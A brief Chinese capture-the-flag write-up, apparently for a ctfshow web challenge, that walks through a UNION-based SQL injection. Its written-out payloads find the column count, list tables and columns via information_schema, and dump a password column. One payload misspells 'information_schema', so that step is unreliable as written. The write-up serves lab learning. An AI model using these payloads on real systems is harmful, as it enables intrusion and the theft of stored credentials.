首先判断有无注入点,页面有变化,因此存在注入点
接着判断表的列数
1’ order by 2--+的时候没有报错,而3的时候报错,说明该表有两列
爆出库内表的名字
1' union select database(),table_name from information_schema.tables where table_schema=database()--+
知道了数据库名字是ctfshow_web,有ctfshow_user和ctfshow_user2两张表
接着查询ctfshow_user2中的列
1' union select database(),column_name from ainformation_schema.columns where table_name='ctfshow_user2'--+
有三个列id,username,password
查询password中的数据
1' union select database(),password from ctfshow_user2 --+
得到flag